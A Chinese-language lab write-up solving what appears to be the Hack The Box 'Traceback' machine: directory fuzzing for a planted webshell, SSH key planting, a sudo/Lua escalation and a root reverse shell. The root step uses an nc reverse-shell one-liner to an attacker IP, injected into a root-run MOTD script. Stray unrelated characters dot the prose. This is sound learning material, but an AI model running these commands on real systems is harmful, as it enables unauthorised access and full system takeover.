概述
目標(biāo)靶機(jī)是一臺(tái)Linux機(jī)器寝殴,部署了一個(gè)網(wǎng)站蒿叠,但是網(wǎng)站被人日了,黑客留下了一些線索和工具在服務(wù)上蚣常,我們需要利用這些線索和工具拿到root和flag市咽。先通過社工找到黑客的信息,從他的github上找到一些webshell的線索抵蚊,然后用wfuzz找到黑客傳到目標(biāo)站點(diǎn)的webshell施绎,利用webshell可以拿到webadmin賬號(hào)權(quán)限,然后通過主機(jī)上的線索找到一個(gè)執(zhí)行lua腳本提升權(quán)限的通道進(jìn)而獲取到另一個(gè)高權(quán)限的賬號(hào)sysadmin贞绳,再通過pspy監(jiān)控發(fā)現(xiàn)本地有一些使用特權(quán)執(zhí)行的定時(shí)任務(wù)腳本谷醉,修改腳本執(zhí)行反彈shell獲取到root權(quán)限。
信息收集
root@vultr:~/htb# nmap -sV -sC 10.10.10.181
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-28 08:06 UTC
Nmap scan report for 10.10.10.181
Host is up (0.076s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
416/tcp filtered silverplatter
1011/tcp filtered unknown
1130/tcp filtered casp
1521/tcp filtered oracle
2119/tcp filtered gsigatekeeper
3476/tcp filtered nppmp
4900/tcp filtered hfcs
5440/tcp filtered unknown
5903/tcp filtered vnc-3
6580/tcp filtered parsec-master
7741/tcp filtered scriptview
8292/tcp filtered blp3
32773/tcp filtered sometimes-rpc9
52869/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.32 seconds
用瀏覽器訪問目標(biāo)網(wǎng)站冈闭,發(fā)現(xiàn)頁面已經(jīng)被人日了俱尼,從頁面留下的信息看Xh4H可能是黑客的名字(目標(biāo)網(wǎng)站是80段,我本地做了映射)
google這個(gè)名字找到了對方的github賬號(hào)拒秘,里面有一個(gè)工程Web-Shells号显。根據(jù)目標(biāo)網(wǎng)站的提示,說黑客留了一些后門在這里躺酒,索性把這個(gè)工程下的webshell名字作為字典嘗試爆破目錄
root@vultr:~/htb# cat fuzz.txt
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php
爆破
使用wfuzz爆破目錄押蚤,果然找到對方使用的webshell文件smevk.php
root@vultr:~/htb# wfuzz -w ./fuzz.txt -u http://10.10.10.181/FUZZ --hc 404,403
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.181/FUZZ
Total requests: 17
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000017: C=200 44 L 151 W 1113 Ch ""
000015: C=200 58 L 100 W 1261 Ch "smevk.php"
Total time: 0.241917
Processed Requests: 17
Filtered Requests: 15
Requests/sec.: 70.27192
用瀏覽器訪問之,發(fā)現(xiàn)是一個(gè)功能很全面的webshell羹应,查看發(fā)現(xiàn)當(dāng)前用戶是webadmin揽碘,為了保證連接的穩(wěn)定性,我們在/home/webadmin/.ssh下面放一個(gè)公鑰,本機(jī)利用私鑰登錄
先在本機(jī)生成公私鑰對
root@vultr:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:2YE9x2+Eyr/bU1JkYYAbvgxxVvScvIBB1kV0qBUnWR0 root@vultr.guest
The key's randomart image is:
+---[RSA 2048]----+
| .+=+BEB|
| +.*ooOo*|
| . O.*+.B |
| = B.o. o|
| S * . oo |
| + .. .|
| . o |
| o. |
| o... |
+----[SHA256]-----+
root@vultr:~# ls -l /root/.ssh/
total 12
-rw------- 1 root root 1823 May 28 08:39 id_rsa
-rw-r--r-- 1 root root 398 May 28 08:39 id_rsa.pub
-rw-r--r-- 1 root root 666 May 28 03:03 known_hosts
把公鑰的文件的內(nèi)容copy出來雳刺,保存成文件authorized_keys劫灶,然后利用webshall直接上傳至/home/webadmin/.ssh,接下來就可以直接用私鑰+ssh登錄了掖桦。
在家目錄下找到一些線索本昏,note.txt提到了lua,然后我們在.bash_history找到了一些操作記錄枪汪,看起來是要使用/home/sysadmin/luvit執(zhí)行privesc.lua腳本涌穆,但是經(jīng)過一通查找,卻并沒有找到這兩個(gè)文件的位置雀久,并且webadmin賬號(hào)沒有權(quán)限讀取sysadmin下面的文件
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 28 01:48:57 2020 from 10.10.14.101
webadmin@traceback:~$ whoami
webadmin
webadmin@traceback:~$
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
提權(quán)
使用sudo -l查看發(fā)現(xiàn)宿稀,我們要找的問題件可以無密碼讀取,正好這個(gè)時(shí)候不知道哪位老哥在家目錄下創(chuàng)建了一個(gè)lua文件獲取bash赖捌,內(nèi)容就一句話os.execute("/bin/bash")祝沸。
根據(jù)前面獲得的提示,執(zhí)行 sudo -u sysadmin /home/sysadmin/luvit script.lua可以直接切到sysadmin的bash越庇,移動(dòng)到sysadmin的家目錄可以獲取到user.txt
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ cd ../sysadmin
sysadmin@traceback:/home/sysadmin$ ls -la
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rw------- 1 sysadmin sysadmin 33 May 28 01:33 user.txt
sysadmin@traceback:/home/sysadmin$
接下來要嘗試獲取root權(quán)限罩锐,這里用到pspy監(jiān)視進(jìn)程,這個(gè)工具可以在普通用戶權(quán)限下觀察到其他用戶執(zhí)行的命令
觀察一會(huì)發(fā)現(xiàn)卤唉,目標(biāo)機(jī)器每30秒會(huì)執(zhí)行一個(gè)cp命令唯欣,把一些文件從backup目錄復(fù)制到/etc/update-motd.d/
/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
移動(dòng)到這個(gè)目錄下,發(fā)現(xiàn)000-header里面的內(nèi)容正好就是ssh登錄的時(shí)候顯示的信息搬味,并且從pspy監(jiān)控的信息看來,當(dāng)用ssh登錄的時(shí)候這里會(huì)自動(dòng)執(zhí)行
sh -c uname -a; w; id; /bin/sh -i正好與這個(gè)腳本吻合蟀拷,可以在后面加一行id來驗(yàn)證
sysadmin@traceback:~$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
id
最后碰纬,我們可以確定ssh登錄時(shí)候會(huì)觸發(fā)用root執(zhí)行這個(gè)腳本,所以我們在這里加一個(gè)nc的反彈shell问芬,在00-header里面添加rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.94 8888 >/tmp/f
同時(shí)在本機(jī)開啟監(jiān)聽nc -lvp 8888悦析,獲取到root的反彈shell
